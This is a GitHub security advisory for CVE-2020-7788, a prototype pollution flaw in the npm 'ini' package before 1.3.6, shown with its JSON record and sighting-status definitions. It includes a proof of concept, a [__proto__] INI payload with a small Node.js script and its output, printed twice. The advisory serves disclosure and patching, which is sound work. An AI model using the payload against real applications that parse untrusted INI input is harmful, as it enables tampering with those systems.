ghsa-qqgx-2p2h-9c37
Vulnerability from github
Published
2020-12-10 16:53
Modified
2022-12-03 03:55
Severity ?
Summary
ini before 1.3.6 vulnerable to Prototype Pollution via ini.parse
Details
Overview
The ini
npm package before version 1.3.6 has a Prototype Pollution vulnerability.
If an attacker submits a malicious INI file to an application that parses it with ini.parse
, they will pollute the prototype on the application. This can be exploited further depending on the context.
Patches
This has been patched in 1.3.6.
Steps to reproduce
payload.ini
[__proto__]
polluted = "polluted"
poc.js: ``` var fs = require('fs') var ini = require('ini')
var parsed = ini.parse(fs.readFileSync('./payload.ini', 'utf-8')) console.log(parsed) console.log(parsed.proto) console.log(polluted) ```
```
node poc.js {} { polluted: 'polluted' } { polluted: 'polluted' } polluted ```
{ "affected": [ { "package": { "ecosystem": "npm", "name": "ini" }, "ranges": [ { "events": [ { "introduced": "0" }, { "fixed": "1.3.6" } ], "type": "ECOSYSTEM" } ] } ], "aliases": [ "CVE-2020-7788" ], "database_specific": { "cwe_ids": [ "CWE-1321" ], "github_reviewed": true, "github_reviewed_at": "2020-12-10T16:51:39Z", "nvd_published_at": "2020-12-11T11:15:00Z", "severity": "HIGH" }, "details": "### Overview\nThe `ini` npm package before version 1.3.6 has a Prototype Pollution vulnerability.\n\nIf an attacker submits a malicious INI file to an application that parses it with `ini.parse`, they will pollute the prototype on the application. This can be exploited further depending on the context.\n\n### Patches\n\nThis has been patched in 1.3.6.\n\n### Steps to reproduce\n\npayload.ini\n```\n[__proto__]\npolluted = \"polluted\"\n```\n\npoc.js:\n```\nvar fs = require(\u0027fs\u0027)\nvar ini = require(\u0027ini\u0027)\n\nvar parsed = ini.parse(fs.readFileSync(\u0027./payload.ini\u0027, \u0027utf-8\u0027))\nconsole.log(parsed)\nconsole.log(parsed.__proto__)\nconsole.log(polluted)\n```\n\n```\n\u003e node poc.js\n{}\n{ polluted: \u0027polluted\u0027 }\n{ polluted: \u0027polluted\u0027 }\npolluted\n```", "id": "GHSA-qqgx-2p2h-9c37", "modified": "2022-12-03T03:55:11Z", "published": "2020-12-10T16:53:45Z", "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-7788" }, { "type": "WEB", "url": "https://github.com/npm/ini/commit/56d2805e07ccd94e2ba0984ac9240ff02d44b6f1" }, { "type": "PACKAGE", "url": "https://github.com/npm/ini" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2020/12/msg00032.html" }, { "type": "WEB", "url": "https://snyk.io/vuln/SNYK-JS-INI-1048974" }, { "type": "WEB", "url": "https://www.npmjs.com/advisories/1589" } ], "schema_version": "1.4.0", "severity": [ { "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "type": "CVSS_V3" } ], "summary": "ini before 1.3.6 vulnerable to Prototype Pollution via ini.parse" }
Loading...
Loading...
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.